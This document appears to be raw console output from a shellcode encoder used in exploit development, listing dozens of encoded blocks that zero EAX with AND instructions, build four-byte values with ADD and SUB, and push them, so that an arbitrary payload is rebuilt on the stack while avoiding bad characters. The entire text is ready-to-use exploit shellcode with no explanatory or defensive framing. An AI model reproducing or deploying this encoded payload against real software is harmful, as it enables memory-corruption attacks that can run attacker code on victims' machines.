[+] No bad character found, using default encoder..
shellcode += "\x25\x4A\x4D\x4E\x55" ## and  eax, 0x554e4d4a
shellcode += "\x25\x35\x32\x31\x2A" ## and  eax, 0x2a313235
shellcode += "\x05\x63\x31\x50\x50" ## add  eax, 0x50503163
shellcode += "\x05\x64\x30\x40\x40" ## add  eax, 0x40403064
shellcode += "\x50"                 ## push eax
[*] Encoding [52c623a7]..
[+] No bad character found, using default encoder..
shellcode += "\x25\x4A\x4D\x4E\x55" ## and  eax, 0x554e4d4a
shellcode += "\x25\x35\x32\x31\x2A" ## and  eax, 0x2a313235
shellcode += "\x05\x53\x12\x63\x31" ## add  eax, 0x31631253
shellcode += "\x05\x54\x11\x63\x21" ## add  eax, 0x21631154
shellcode += "\x50"                 ## push eax
[*] Encoding [fda045b6]..
[!] Possible bad character found, using alterantive encoder..
shellcode += "\x25\x4A\x4D\x4E\x55" ## and  eax, 0x554e4d4a
shellcode += "\x25\x35\x32\x31\x2A" ## and  eax, 0x2a313235
shellcode += "\x05\x63\x33\x51\x76" ## add  eax, 0x76513363
shellcode += "\x05\x53\x23\x41\x66" ## add  eax, 0x66412353
shellcode += "\x05\x33\x22\x41\x54" ## add  eax, 0x54412233
shellcode += "\x2D\x33\x33\x33\x33" ## sub  eax, 0x33333333
shellcode += "\x50"                 ## push eax
[*] Encoding [8f4bc1e9]..
[!] Possible bad character found, using alterantive encoder..
shellcode += "\x25\x4A\x4D\x4E\x55" ## and  eax, 0x554e4d4a
shellcode += "\x25\x35\x32\x31\x2A" ## and  eax, 0x2a313235
shellcode += "\x05\x64\x61\x36\x47" ## add  eax, 0x47366164
shellcode += "\x05\x54\x52\x25\x46" ## add  eax, 0x46255254
shellcode += "\x05\x64\x41\x23\x35" ## add  eax, 0x35234164
shellcode += "\x2D\x33\x33\x33\x33" ## sub  eax, 0x33333333
shellcode += "\x50"                 ## push eax
[*] Encoding [8a3ed90d]..
[+] No bad character found, using default encoder..
shellcode += "\x25\x4A\x4D\x4E\x55" ## and  eax, 0x554e4d4a
shellcode += "\x25\x35\x32\x31\x2A" ## and  eax, 0x2a313235
shellcode += "\x05\x07\x75\x27\x45" ## add  eax, 0x45277507
shellcode += "\x05\x06\x64\x17\x45" ## add  eax, 0x45176406
shellcode += "\x50"                 ## push eax
[*] Encoding [f18a5af3]..
[!] Possible bad character found, using alterantive encoder..
shellcode += "\x25\x4A\x4D\x4E\x55" ## and  eax, 0x554e4d4a
shellcode += "\x25\x35\x32\x31\x2A" ## and  eax, 0x2a313235
shellcode += "\x05\x72\x35\x45\x71" ## add  eax, 0x71453572
shellcode += "\x05\x62\x34\x44\x62" ## add  eax, 0x62443462
shellcode += "\x05\x52\x24\x34\x51" ## add  eax, 0x51342452
shellcode += "\x2D\x33\x33\x33\x33" ## sub  eax, 0x33333333
shellcode += "\x50"                 ## push eax
[*] Encoding [b25f596d]..
[!] Possible bad character found, using alterantive encoder..
shellcode += "\x25\x4A\x4D\x4E\x55" ## and  eax, 0x554e4d4a
shellcode += "\x25\x35\x32\x31\x2A" ## and  eax, 0x2a313235
shellcode += "\x05\x36\x34\x37\x62" ## add  eax, 0x62373436
shellcode += "\x05\x36\x34\x36\x51" ## add  eax, 0x51363436
shellcode += "\x05\x34\x24\x25\x32" ## add  eax, 0x32252434
shellcode += "\x2D\x33\x33\x33\x33" ## sub  eax, 0x33333333
shellcode += "\x50"                 ## push eax
[*] Encoding [ef8afce4]..
[!] Possible bad character found, using alterantive encoder..
shellcode += "\x25\x4A\x4D\x4E\x55" ## and  eax, 0x554e4d4a
shellcode += "\x25\x35\x32\x31\x2A" ## and  eax, 0x2a313235
shellcode += "\x05\x63\x76\x45\x67" ## add  eax, 0x67457663
shellcode += "\x05\x52\x65\x44\x56" ## add  eax, 0x56446552
shellcode += "\x05\x62\x54\x34\x65" ## add  eax, 0x65345462
shellcode += "\x2D\x33\x33\x33\x33" ## sub  eax, 0x33333333
shellcode += "\x50"                 ## push eax
[*] Encoding [4686b6d4]..
[+] No bad character found, using default encoder..
shellcode += "\x25\x4A\x4D\x4E\x55" ## and  eax, 0x554e4d4a
shellcode += "\x25\x35\x32\x31\x2A" ## and  eax, 0x2a313235
shellcode += "\x05\x72\x63\x43\x23" ## add  eax, 0x23436372
shellcode += "\x05\x62\x53\x43\x23" ## add  eax, 0x23435362
shellcode += "\x50"                 ## push eax
[*] Encoding [c24b4924]..
[+] No bad character found, using default encoder..
shellcode += "\x25\x4A\x4D\x4E\x55" ## and  eax, 0x554e4d4a
shellcode += "\x25\x35\x32\x31\x2A" ## and  eax, 0x2a313235
shellcode += "\x05\x12\x25\x26\x61" ## add  eax, 0x61262512
shellcode += "\x05\x12\x24\x25\x61" ## add  eax, 0x61252412
shellcode += "\x50"                 ## push eax
[*] Encoding [9e32bca0]..
[+] No bad character found, using default encoder..
shellcode += "\x25\x4A\x4D\x4E\x55" ## and  eax, 0x554e4d4a
shellcode += "\x25\x35\x32\x31\x2A" ## and  eax, 0x2a313235
shellcode += "\x05\x50\x66\x21\x57" ## add  eax, 0x57216650
shellcode += "\x05\x50\x56\x11\x47" ## add  eax, 0x47115650
shellcode += "\x50"                 ## push eax
[*] Encoding [110df8f5]..
[!] Possible bad character found, using alterantive encoder..
shellcode += "\x25\x4A\x4D\x4E\x55" ## and  eax, 0x554e4d4a
shellcode += "\x25\x35\x32\x31\x2A" ## and  eax, 0x2a313235
shellcode += "\x05\x73\x74\x16\x11" ## add  eax, 0x11167473
shellcode += "\x05\x63\x64\x16\x22" ## add  eax, 0x22166463
shellcode += "\x05\x52\x53\x14\x11" ## add  eax, 0x11145352
shellcode += "\x2D\x33\x33\x33\x33" ## sub  eax, 0x33333333
shellcode += "\x50"                 ## push eax
[*] Encoding [9fe10e9f]..
[!] Possible bad character found, using alterantive encoder..
shellcode += "\x25\x4A\x4D\x4E\x55" ## and  eax, 0x554e4d4a
shellcode += "\x25\x35\x32\x31\x2A" ## and  eax, 0x2a313235
shellcode += "\x05\x47\x16\x61\x47" ## add  eax, 0x47611647
shellcode += "\x05\x46\x15\x52\x46" ## add  eax, 0x46521546
shellcode += "\x05\x45\x16\x61\x45" ## add  eax, 0x45611645
shellcode += "\x2D\x33\x33\x33\x33" ## sub  eax, 0x33333333
shellcode += "\x50"                 ## push eax
[*] Encoding [9f978d53]..
[!] Possible bad character found, using alterantive encoder..
shellcode += "\x25\x4A\x4D\x4E\x55" ## and  eax, 0x554e4d4a
shellcode += "\x25\x35\x32\x31\x2A" ## and  eax, 0x2a313235
shellcode += "\x05\x32\x46\x44\x47" ## add  eax, 0x47444632
shellcode += "\x05\x32\x46\x43\x46" ## add  eax, 0x46434632
shellcode += "\x05\x22\x34\x43\x45" ## add  eax, 0x45433422
shellcode += "\x2D\x33\x33\x33\x33" ## sub  eax, 0x33333333
shellcode += "\x50"                 ## push eax
[*] Encoding [c6ffc2fc]..
[!] Possible bad character found, using alterantive encoder..
shellcode += "\x25\x4A\x4D\x4E\x55" ## and  eax, 0x554e4d4a
shellcode += "\x25\x35\x32\x31\x2A" ## and  eax, 0x2a313235
shellcode += "\x05\x76\x62\x77\x63" ## add  eax, 0x63776276
shellcode += "\x05\x65\x51\x66\x53" ## add  eax, 0x53665165
shellcode += "\x05\x54\x42\x55\x43" ## add  eax, 0x43554254
shellcode += "\x2D\x33\x33\x33\x33" ## sub  eax, 0x33333333
shellcode += "\x50"                 ## push eax
[*] Encoding [0c056005]..
[+] No bad character found, using default encoder..
shellcode += "\x25\x4A\x4D\x4E\x55" ## and  eax, 0x554e4d4a
shellcode += "\x25\x35\x32\x31\x2A" ## and  eax, 0x2a313235
shellcode += "\x05\x03\x30\x03\x06" ## add  eax, 0x06033003
shellcode += "\x05\x02\x30\x02\x06" ## add  eax, 0x06023002
shellcode += "\x50"                 ## push eax
[*] Encoding [a9abb653]..
[+] No bad character found, using default encoder..
shellcode += "\x25\x4A\x4D\x4E\x55" ## and  eax, 0x554e4d4a
shellcode += "\x25\x35\x32\x31\x2A" ## and  eax, 0x2a313235
shellcode += "\x05\x32\x63\x56\x55" ## add  eax, 0x55566332
shellcode += "\x05\x21\x53\x55\x54" ## add  eax, 0x54555321
shellcode += "\x50"                 ## push eax
[*] Encoding [f5ffea4a]..
[!] Possible bad character found, using alterantive encoder..
shellcode += "\x25\x4A\x4D\x4E\x55" ## and  eax, 0x554e4d4a
shellcode += "\x25\x35\x32\x31\x2A" ## and  eax, 0x2a313235
shellcode += "\x05\x35\x65\x77\x73" ## add  eax, 0x73776535
shellcode += "\x05\x24\x54\x66\x63" ## add  eax, 0x63665424
shellcode += "\x05\x24\x64\x55\x52" ## add  eax, 0x52556424
shellcode += "\x2D\x33\x33\x33\x33" ## sub  eax, 0x33333333
shellcode += "\x50"                 ## push eax
[*] Encoding [2befcdee]..
[!] Possible bad character found, using alterantive encoder..
shellcode += "\x25\x4A\x4D\x4E\x55" ## and  eax, 0x554e4d4a
shellcode += "\x25\x35\x32\x31\x2A" ## and  eax, 0x2a313235
shellcode += "\x05\x66\x66\x67\x26" ## add  eax, 0x26676666
shellcode += "\x05\x55\x56\x56\x15" ## add  eax, 0x15565655
shellcode += "\x05\x66\x44\x65\x23" ## add  eax, 0x23654466
shellcode += "\x2D\x33\x33\x33\x33" ## sub  eax, 0x33333333
shellcode += "\x50"                 ## push eax
[*] Encoding [a6eec20d]..
[+] No bad character found, using default encoder..
shellcode += "\x25\x4A\x4D\x4E\x55" ## and  eax, 0x554e4d4a
shellcode += "\x25\x35\x32\x31\x2A" ## and  eax, 0x2a313235
shellcode += "\x05\x07\x61\x77\x53" ## add  eax, 0x53776107
shellcode += "\x05\x06\x61\x77\x53" ## add  eax, 0x53776106
shellcode += "\x50"                 ## push eax
[*] Encoding [792af94b]..
[!] Possible bad character found, using alterantive encoder..
shellcode += "\x25\x4A\x4D\x4E\x55" ## and  eax, 0x554e4d4a
shellcode += "\x25\x35\x32\x31\x2A" ## and  eax, 0x2a313235
shellcode += "\x05\x36\x74\x25\x44" ## add  eax, 0x44257436
shellcode += "\x05\x25\x64\x14\x34" ## add  eax, 0x34146425
shellcode += "\x05\x23\x54\x24\x34" ## add  eax, 0x34245423
shellcode += "\x2D\x33\x33\x33\x33" ## sub  eax, 0x33333333
shellcode += "\x50"                 ## push eax
[*] Encoding [60344ed0]..
[+] No bad character found, using default encoder..
shellcode += "\x25\x4A\x4D\x4E\x55" ## and  eax, 0x554e4d4a
shellcode += "\x25\x35\x32\x31\x2A" ## and  eax, 0x2a313235
shellcode += "\x05\x70\x27\x22\x30" ## add  eax, 0x30222770
shellcode += "\x05\x60\x27\x12\x30" ## add  eax, 0x30122760
shellcode += "\x50"                 ## push eax
[*] Encoding [4c50371e]..
[+] No bad character found, using default encoder..
shellcode += "\x25\x4A\x4D\x4E\x55" ## and  eax, 0x554e4d4a
shellcode += "\x25\x35\x32\x31\x2A" ## and  eax, 0x2a313235
shellcode += "\x05\x17\x23\x30\x26" ## add  eax, 0x26302317
shellcode += "\x05\x07\x14\x20\x26" ## add  eax, 0x26201407
shellcode += "\x50"                 ## push eax
[*] Encoding [1b0798fd]..
[!] Possible bad character found, using alterantive encoder..
shellcode += "\x25\x4A\x4D\x4E\x55" ## and  eax, 0x554e4d4a
shellcode += "\x25\x35\x32\x31\x2A" ## and  eax, 0x2a313235
shellcode += "\x05\x76\x44\x14\x16" ## add  eax, 0x16144476
shellcode += "\x05\x66\x44\x13\x25" ## add  eax, 0x25134466
shellcode += "\x05\x54\x43\x13\x13" ## add  eax, 0x13134354
shellcode += "\x2D\x33\x33\x33\x33" ## sub  eax, 0x33333333
shellcode += "\x50"                 ## push eax
[*] Encoding [4df7f36f]..
[!] Possible bad character found, using alterantive encoder..
shellcode += "\x25\x4A\x4D\x4E\x55" ## and  eax, 0x554e4d4a
shellcode += "\x25\x35\x32\x31\x2A" ## and  eax, 0x2a313235
shellcode += "\x05\x37\x72\x74\x36" ## add  eax, 0x36747237
shellcode += "\x05\x36\x62\x63\x26" ## add  eax, 0x26636236
shellcode += "\x05\x35\x52\x53\x24" ## add  eax, 0x24535235
shellcode += "\x2D\x33\x33\x33\x33" ## sub  eax, 0x33333333
shellcode += "\x50"                 ## push eax
[*] Encoding [815fc550]..
[!] Possible bad character found, using alterantive encoder..
shellcode += "\x25\x4A\x4D\x4E\x55" ## and  eax, 0x554e4d4a
shellcode += "\x25\x35\x32\x31\x2A" ## and  eax, 0x2a313235
shellcode += "\x05\x31\x63\x37\x41" ## add  eax, 0x41376331
shellcode += "\x05\x31\x53\x36\x42" ## add  eax, 0x42365331
shellcode += "\x05\x21\x42\x25\x31" ## add  eax, 0x31254221
shellcode += "\x2D\x33\x33\x33\x33" ## sub  eax, 0x33333333
shellcode += "\x50"                 ## push eax
[*] Encoding [07fd8e90]..
[!] Possible bad character found, using alterantive encoder..
shellcode += "\x25\x4A\x4D\x4E\x55" ## and  eax, 0x554e4d4a
shellcode += "\x25\x35\x32\x31\x2A" ## and  eax, 0x2a313235
shellcode += "\x05\x41\x46\x76\x14" ## add  eax, 0x14764641
shellcode += "\x05\x41\x45\x66\x13" ## add  eax, 0x13664541
shellcode += "\x05\x41\x36\x54\x13" ## add  eax, 0x13543641
shellcode += "\x2D\x33\x33\x33\x33" ## sub  eax, 0x33333333
shellcode += "\x50"                 ## push eax
[*] Encoding [6eede357]..
[+] No bad character found, using default encoder..
shellcode += "\x25\x4A\x4D\x4E\x55" ## and  eax, 0x554e4d4a
shellcode += "\x25\x35\x32\x31\x2A" ## and  eax, 0x2a313235
shellcode += "\x05\x33\x72\x77\x37" ## add  eax, 0x37777233
shellcode += "\x05\x24\x71\x76\x37" ## add  eax, 0x37767124
shellcode += "\x50"                 ## push eax
[*] Encoding [9f08ccdc]..
[!] Possible bad character found, using alterantive encoder..
shellcode += "\x25\x4A\x4D\x4E\x55" ## and  eax, 0x554e4d4a
shellcode += "\x25\x35\x32\x31\x2A" ## and  eax, 0x2a313235
shellcode += "\x05\x66\x66\x14\x47" ## add  eax, 0x47146666
shellcode += "\x05\x65\x55\x14\x46" ## add  eax, 0x46145565
shellcode += "\x05\x44\x44\x13\x45" ## add  eax, 0x45134444
shellcode += "\x2D\x33\x33\x33\x33" ## sub  eax, 0x33333333
shellcode += "\x50"                 ## push eax
[*] Encoding [9f6dd613]..
[!] Possible bad character found, using alterantive encoder..
shellcode += "\x25\x4A\x4D\x4E\x55" ## and  eax, 0x554e4d4a
shellcode += "\x25\x35\x32\x31\x2A" ## and  eax, 0x2a313235
shellcode += "\x05\x12\x63\x36\x47" ## add  eax, 0x47366312
shellcode += "\x05\x22\x63\x36\x46" ## add  eax, 0x46366322
shellcode += "\x05\x12\x43\x34\x45" ## add  eax, 0x45344312
shellcode += "\x2D\x33\x33\x33\x33" ## sub  eax, 0x33333333
shellcode += "\x50"                 ## push eax
[*] Encoding [fd954b6a]..
[!] Possible bad character found, using alterantive encoder..
shellcode += "\x25\x4A\x4D\x4E\x55" ## and  eax, 0x554e4d4a
shellcode += "\x25\x35\x32\x31\x2A" ## and  eax, 0x2a313235
shellcode += "\x05\x35\x36\x43\x76" ## add  eax, 0x76433635
shellcode += "\x05\x34\x25\x43\x66" ## add  eax, 0x66432534
shellcode += "\x05\x34\x23\x42\x54" ## add  eax, 0x54422334
shellcode += "\x2D\x33\x33\x33\x33" ## sub  eax, 0x33333333
shellcode += "\x50"                 ## push eax
[*] Encoding [403a1a04]..
[+] No bad character found, using default encoder..
shellcode += "\x25\x4A\x4D\x4E\x55" ## and  eax, 0x554e4d4a
shellcode += "\x25\x35\x32\x31\x2A" ## and  eax, 0x2a313235
shellcode += "\x05\x02\x15\x25\x20" ## add  eax, 0x20251502
shellcode += "\x05\x02\x05\x15\x20" ## add  eax, 0x20150502
shellcode += "\x50"                 ## push eax
[*] Encoding [28dc933e]..
[+] No bad character found, using default encoder..
shellcode += "\x25\x4A\x4D\x4E\x55" ## and  eax, 0x554e4d4a
shellcode += "\x25\x35\x32\x31\x2A" ## and  eax, 0x2a313235
shellcode += "\x05\x27\x52\x76\x14" ## add  eax, 0x14765227
shellcode += "\x05\x17\x41\x66\x14" ## add  eax, 0x14664117
shellcode += "\x50"                 ## push eax
[*] Encoding [c11c4056]..
[+] No bad character found, using default encoder..
shellcode += "\x25\x4A\x4D\x4E\x55" ## and  eax, 0x554e4d4a
shellcode += "\x25\x35\x32\x31\x2A" ## and  eax, 0x2a313235
shellcode += "\x05\x33\x20\x16\x61" ## add  eax, 0x61162033
shellcode += "\x05\x23\x20\x06\x60" ## add  eax, 0x60062023
shellcode += "\x50"                 ## push eax
[*] Encoding [24761769]..
[+] No bad character found, using default encoder..
shellcode += "\x25\x4A\x4D\x4E\x55" ## and  eax, 0x554e4d4a
shellcode += "\x25\x35\x32\x31\x2A" ## and  eax, 0x2a313235
shellcode += "\x05\x35\x13\x33\x12" ## add  eax, 0x12331335
shellcode += "\x05\x34\x04\x43\x12" ## add  eax, 0x12430434
shellcode += "\x50"                 ## push eax
[*] Encoding [a38b7dc0]..
[+] No bad character found, using default encoder..
shellcode += "\x25\x4A\x4D\x4E\x55" ## and  eax, 0x554e4d4a
shellcode += "\x25\x35\x32\x31\x2A" ## and  eax, 0x2a313235
shellcode += "\x05\x60\x37\x46\x52" ## add  eax, 0x52463760
shellcode += "\x05\x60\x46\x45\x51" ## add  eax, 0x51454660
shellcode += "\x50"                 ## push eax
[*] Encoding [69605c9f]..
[!] Possible bad character found, using alterantive encoder..
shellcode += "\x25\x4A\x4D\x4E\x55" ## and  eax, 0x554e4d4a
shellcode += "\x25\x35\x32\x31\x2A" ## and  eax, 0x2a313235
shellcode += "\x05\x47\x36\x31\x34" ## add  eax, 0x34313647
shellcode += "\x05\x46\x35\x31\x34" ## add  eax, 0x34313546
shellcode += "\x05\x45\x24\x31\x34" ## add  eax, 0x34312445
shellcode += "\x2D\x33\x33\x33\x33" ## sub  eax, 0x33333333
shellcode += "\x50"                 ## push eax
[*] Encoding [666ab42e]..
[+] No bad character found, using default encoder..
shellcode += "\x25\x4A\x4D\x4E\x55" ## and  eax, 0x554e4d4a
shellcode += "\x25\x35\x32\x31\x2A" ## and  eax, 0x2a313235
shellcode += "\x05\x17\x62\x35\x33" ## add  eax, 0x33356217
shellcode += "\x05\x17\x52\x35\x33" ## add  eax, 0x33355217
shellcode += "\x50"                 ## push eax
[*] Encoding [85baf37d]..
[!] Possible bad character found, using alterantive encoder..
shellcode += "\x25\x4A\x4D\x4E\x55" ## and  eax, 0x554e4d4a
shellcode += "\x25\x35\x32\x31\x2A" ## and  eax, 0x2a313235
shellcode += "\x05\x46\x72\x65\x43" ## add  eax, 0x43657246
shellcode += "\x05\x36\x62\x54\x43" ## add  eax, 0x43546236
shellcode += "\x05\x34\x52\x34\x32" ## add  eax, 0x32345234
shellcode += "\x2D\x33\x33\x33\x33" ## sub  eax, 0x33333333
shellcode += "\x50"                 ## push eax
[*] Encoding [29ea53a8]..
[+] No bad character found, using default encoder..
shellcode += "\x25\x4A\x4D\x4E\x55" ## and  eax, 0x554e4d4a
shellcode += "\x25\x35\x32\x31\x2A" ## and  eax, 0x2a313235
shellcode += "\x05\x54\x32\x75\x15" ## add  eax, 0x15753254
shellcode += "\x05\x54\x21\x75\x14" ## add  eax, 0x14752154
shellcode += "\x50"                 ## push eax
[*] Encoding [84eab787]..
[+] No bad character found, using default encoder..
shellcode += "\x25\x4A\x4D\x4E\x55" ## and  eax, 0x554e4d4a
shellcode += "\x25\x35\x32\x31\x2A" ## and  eax, 0x2a313235
shellcode += "\x05\x43\x63\x75\x42" ## add  eax, 0x42756343
shellcode += "\x05\x44\x54\x75\x42" ## add  eax, 0x42755444
shellcode += "\x50"                 ## push eax
[*] Encoding [2d70e7d3]..
[+] No bad character found, using default encoder..
shellcode += "\x25\x4A\x4D\x4E\x55" ## and  eax, 0x554e4d4a
shellcode += "\x25\x35\x32\x31\x2A" ## and  eax, 0x2a313235
shellcode += "\x05\x72\x73\x30\x17" ## add  eax, 0x17307372
shellcode += "\x05\x61\x74\x40\x16" ## add  eax, 0x16407461
shellcode += "\x50"                 ## push eax
[*] Encoding [e6599628]..
[+] No bad character found, using default encoder..
shellcode += "\x25\x4A\x4D\x4E\x55" ## and  eax, 0x554e4d4a
shellcode += "\x25\x35\x32\x31\x2A" ## and  eax, 0x2a313235
shellcode += "\x05\x14\x53\x35\x73" ## add  eax, 0x73355314
shellcode += "\x05\x14\x43\x24\x73" ## add  eax, 0x73244314
shellcode += "\x50"                 ## push eax
[*] Encoding [17c52ef1]..
[!] Possible bad character found, using alterantive encoder..
shellcode += "\x25\x4A\x4D\x4E\x55" ## and  eax, 0x554e4d4a
shellcode += "\x25\x35\x32\x31\x2A" ## and  eax, 0x2a313235
shellcode += "\x05\x71\x26\x63\x14" ## add  eax, 0x14632671
shellcode += "\x05\x62\x15\x53\x23" ## add  eax, 0x23531562
shellcode += "\x05\x51\x26\x42\x13" ## add  eax, 0x13422651
shellcode += "\x2D\x33\x33\x33\x33" ## sub  eax, 0x33333333
shellcode += "\x50"                 ## push eax
[*] Encoding [d032e078]..
[+] No bad character found, using default encoder..
shellcode += "\x25\x4A\x4D\x4E\x55" ## and  eax, 0x554e4d4a
shellcode += "\x25\x35\x32\x31\x2A" ## and  eax, 0x2a313235
shellcode += "\x05\x34\x70\x21\x70" ## add  eax, 0x70217034
shellcode += "\x05\x44\x70\x11\x60" ## add  eax, 0x60117044
shellcode += "\x50"                 ## push eax
[*] Encoding [5b944bd7]..
[+] No bad character found, using default encoder..
shellcode += "\x25\x4A\x4D\x4E\x55" ## and  eax, 0x554e4d4a
shellcode += "\x25\x35\x32\x31\x2A" ## and  eax, 0x2a313235
shellcode += "\x05\x73\x26\x52\x36" ## add  eax, 0x36522673
shellcode += "\x05\x64\x25\x42\x25" ## add  eax, 0x25422564
shellcode += "\x50"                 ## push eax
[*] Encoding [69e738bf]..
[!] Possible bad character found, using alterantive encoder..
shellcode += "\x25\x4A\x4D\x4E\x55" ## and  eax, 0x554e4d4a
shellcode += "\x25\x35\x32\x31\x2A" ## and  eax, 0x2a313235
shellcode += "\x05\x67\x24\x64\x34" ## add  eax, 0x34642467
shellcode += "\x05\x56\x24\x53\x34" ## add  eax, 0x34532456
shellcode += "\x05\x35\x23\x63\x34" ## add  eax, 0x34632335
shellcode += "\x2D\x33\x33\x33\x33" ## sub  eax, 0x33333333
shellcode += "\x50"                 ## push eax
[*] Encoding [69d7f14b]..
[!] Possible bad character found, using alterantive encoder..
shellcode += "\x25\x4A\x4D\x4E\x55" ## and  eax, 0x554e4d4a
shellcode += "\x25\x35\x32\x31\x2A" ## and  eax, 0x2a313235
shellcode += "\x05\x36\x71\x64\x34" ## add  eax, 0x34647136
shellcode += "\x05\x25\x62\x63\x34" ## add  eax, 0x34636225
shellcode += "\x05\x23\x51\x43\x34" ## add  eax, 0x34435123
shellcode += "\x2D\x33\x33\x33\x33" ## sub  eax, 0x33333333
shellcode += "\x50"                 ## push eax
[*] Encoding [fc74781e]..
[!] Possible bad character found, using alterantive encoder..
shellcode += "\x25\x4A\x4D\x4E\x55" ## and  eax, 0x554e4d4a
shellcode += "\x25\x35\x32\x31\x2A" ## and  eax, 0x2a313235
shellcode += "\x05\x16\x44\x43\x76" ## add  eax, 0x76434416
shellcode += "\x05\x25\x34\x32\x65" ## add  eax, 0x65323425
shellcode += "\x05\x16\x33\x32\x54" ## add  eax, 0x54323316
shellcode += "\x2D\x33\x33\x33\x33" ## sub  eax, 0x33333333
shellcode += "\x50"                 ## push eax
[*] Encoding [d0ffdda1]..
[!] Possible bad character found, using alterantive encoder..
shellcode += "\x25\x4A\x4D\x4E\x55" ## and  eax, 0x554e4d4a
shellcode += "\x25\x35\x32\x31\x2A" ## and  eax, 0x2a313235
shellcode += "\x05\x51\x66\x77\x61" ## add  eax, 0x61776651
shellcode += "\x05\x42\x66\x66\x61" ## add  eax, 0x61666642
shellcode += "\x05\x41\x44\x55\x41" ## add  eax, 0x41554441
shellcode += "\x2D\x33\x33\x33\x33" ## sub  eax, 0x33333333
shellcode += "\x50"                 ## push eax
[*] Encoding [6e9fa0cf]..
[!] Possible bad character found, using alterantive encoder..
shellcode += "\x25\x4A\x4D\x4E\x55" ## and  eax, 0x554e4d4a
shellcode += "\x25\x35\x32\x31\x2A" ## and  eax, 0x2a313235
shellcode += "\x05\x67\x51\x47\x36" ## add  eax, 0x36475167
shellcode += "\x05\x56\x41\x46\x35" ## add  eax, 0x35464156
shellcode += "\x05\x45\x41\x45\x36" ## add  eax, 0x36454145
shellcode += "\x2D\x33\x33\x33\x33" ## sub  eax, 0x33333333
shellcode += "\x50"                 ## push eax
[*] Encoding [8286b914]..
[+] No bad character found, using default encoder..
shellcode += "\x25\x4A\x4D\x4E\x55" ## and  eax, 0x554e4d4a
shellcode += "\x25\x35\x32\x31\x2A" ## and  eax, 0x2a313235
shellcode += "\x05\x12\x65\x43\x41" ## add  eax, 0x41436512
shellcode += "\x05\x02\x54\x43\x41" ## add  eax, 0x41435402
shellcode += "\x50"                 ## push eax
[*] Encoding [c6029a4e]..
[+] No bad character found, using default encoder..
shellcode += "\x25\x4A\x4D\x4E\x55" ## and  eax, 0x554e4d4a
shellcode += "\x25\x35\x32\x31\x2A" ## and  eax, 0x2a313235
shellcode += "\x05\x27\x55\x01\x63" ## add  eax, 0x63015527
shellcode += "\x05\x27\x45\x01\x63" ## add  eax, 0x63014527
shellcode += "\x50"                 ## push eax
[*] Encoding [4fcc1bc5]..
[!] Possible bad character found, using alterantive encoder..
shellcode += "\x25\x4A\x4D\x4E\x55" ## and  eax, 0x554e4d4a
shellcode += "\x25\x35\x32\x31\x2A" ## and  eax, 0x2a313235
shellcode += "\x05\x63\x16\x66\x37" ## add  eax, 0x37661663
shellcode += "\x05\x53\x25\x55\x26" ## add  eax, 0x26552553
shellcode += "\x05\x42\x13\x44\x25" ## add  eax, 0x25441342
shellcode += "\x2D\x33\x33\x33\x33" ## sub  eax, 0x33333333
shellcode += "\x50"                 ## push eax
[*] Encoding [32b7b632]..
[+] No bad character found, using default encoder..
shellcode += "\x25\x4A\x4D\x4E\x55" ## and  eax, 0x554e4d4a
shellcode += "\x25\x35\x32\x31\x2A" ## and  eax, 0x2a313235
shellcode += "\x05\x21\x63\x63\x21" ## add  eax, 0x21636321
shellcode += "\x05\x11\x53\x54\x11" ## add  eax, 0x11545311
shellcode += "\x50"                 ## push eax
[*] Encoding [2eefb075]..
[!] Possible bad character found, using alterantive encoder..
shellcode += "\x25\x4A\x4D\x4E\x55" ## and  eax, 0x554e4d4a
shellcode += "\x25\x35\x32\x31\x2A" ## and  eax, 0x2a313235
shellcode += "\x05\x43\x61\x67\x26" ## add  eax, 0x26676143
shellcode += "\x05\x33\x51\x56\x15" ## add  eax, 0x15565133
shellcode += "\x05\x32\x31\x65\x26" ## add  eax, 0x26653132
shellcode += "\x2D\x33\x33\x33\x33" ## sub  eax, 0x33333333
shellcode += "\x50"                 ## push eax
[*] Encoding [20642691]..
[+] No bad character found, using default encoder..
shellcode += "\x25\x4A\x4D\x4E\x55" ## and  eax, 0x554e4d4a
shellcode += "\x25\x35\x32\x31\x2A" ## and  eax, 0x2a313235
shellcode += "\x05\x51\x13\x32\x10" ## add  eax, 0x10321351
shellcode += "\x05\x40\x13\x32\x10" ## add  eax, 0x10321340
shellcode += "\x50"                 ## push eax
[*] Encoding [90b87dd2]..
[+] No bad character found, using default encoder..
shellcode += "\x25\x4A\x4D\x4E\x55" ## and  eax, 0x554e4d4a
shellcode += "\x25\x35\x32\x31\x2A" ## and  eax, 0x2a313235
shellcode += "\x05\x71\x37\x64\x50" ## add  eax, 0x50643771
shellcode += "\x05\x61\x46\x54\x40" ## add  eax, 0x40544661
shellcode += "\x50"                 ## push eax
[*] Encoding [361ae804]..
[+] No bad character found, using default encoder..
shellcode += "\x25\x4A\x4D\x4E\x55" ## and  eax, 0x554e4d4a
shellcode += "\x25\x35\x32\x31\x2A" ## and  eax, 0x2a313235
shellcode += "\x05\x02\x74\x15\x23" ## add  eax, 0x23157402
shellcode += "\x05\x02\x74\x05\x13" ## add  eax, 0x13057402
shellcode += "\x50"                 ## push eax
[*] Encoding [44ddef79]..
[!] Possible bad character found, using alterantive encoder..
shellcode += "\x25\x4A\x4D\x4E\x55" ## and  eax, 0x554e4d4a
shellcode += "\x25\x35\x32\x31\x2A" ## and  eax, 0x2a313235
shellcode += "\x05\x44\x67\x66\x33" ## add  eax, 0x33666744
shellcode += "\x05\x34\x56\x66\x22" ## add  eax, 0x22665634
shellcode += "\x05\x34\x65\x44\x22" ## add  eax, 0x22446534
shellcode += "\x2D\x33\x33\x33\x33" ## sub  eax, 0x33333333
shellcode += "\x50"                 ## push eax
[*] Encoding [36a39886]..
[+] No bad character found, using default encoder..
shellcode += "\x25\x4A\x4D\x4E\x55" ## and  eax, 0x554e4d4a
shellcode += "\x25\x35\x32\x31\x2A" ## and  eax, 0x2a313235
shellcode += "\x05\x43\x54\x52\x23" ## add  eax, 0x23525443
shellcode += "\x05\x43\x44\x51\x13" ## add  eax, 0x13514443
shellcode += "\x50"                 ## push eax
[*] Encoding [f1624073]..
[!] Possible bad character found, using alterantive encoder..
shellcode += "\x25\x4A\x4D\x4E\x55" ## and  eax, 0x554e4d4a
shellcode += "\x25\x35\x32\x31\x2A" ## and  eax, 0x2a313235
shellcode += "\x05\x42\x31\x32\x71" ## add  eax, 0x71323142
shellcode += "\x05\x32\x21\x31\x62" ## add  eax, 0x62312132
shellcode += "\x05\x32\x21\x32\x51" ## add  eax, 0x51322132
shellcode += "\x2D\x33\x33\x33\x33" ## sub  eax, 0x33333333
shellcode += "\x50"                 ## push eax
